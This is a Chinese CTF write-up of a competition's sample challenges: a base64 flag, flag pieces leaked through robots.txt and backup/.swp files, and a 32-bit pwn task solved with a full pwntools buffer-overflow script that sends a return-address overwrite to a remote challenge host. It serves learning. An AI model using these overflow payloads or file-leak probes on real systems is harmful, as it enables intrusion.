样题果然还是只能是样题，和ciscn一样
水篇文章

测试1_签到

flag{hello_test}

测试2_docker

访问没啥内容，稍微扫一下

稍微扫一下

访问rebots.txt得到flag1
flag{info_1

访问index.php~得到flag2
s_v3ry_im

访问/.index.php.swp可以下载一个文件，flag3

flag{info_1s_v3ry_imp0rtant_hack}

测试3_附件

zmxh是base64的flag头

flag{simple_base}

测试4_pwn

打开看字符串

有/bin/sh
和input什么
先看input

猜测sub_806CB20就是gets
不确定可以动调

ebp离栈底0x68 ebp是4
ebp是32位长度是4
rbp是64位存档是8

后门函数地址是0x804890F

直接构造payload

from pwn import *
context(arch='amd64',os='linux',log_level='debug')
#r=process('./filename')#打本地使用
r=remote('8.147.132.32', 18832)
p=b'a'*(0x68+0x4)+p32(0x804890F)
#r.sendlineafter(b'pwn me',p)
r.sendline(p)
r.interactive()

测试5 测试5_teamtoken

直接交test_teamtoken

测试_web动态flag

访问靶机就是flag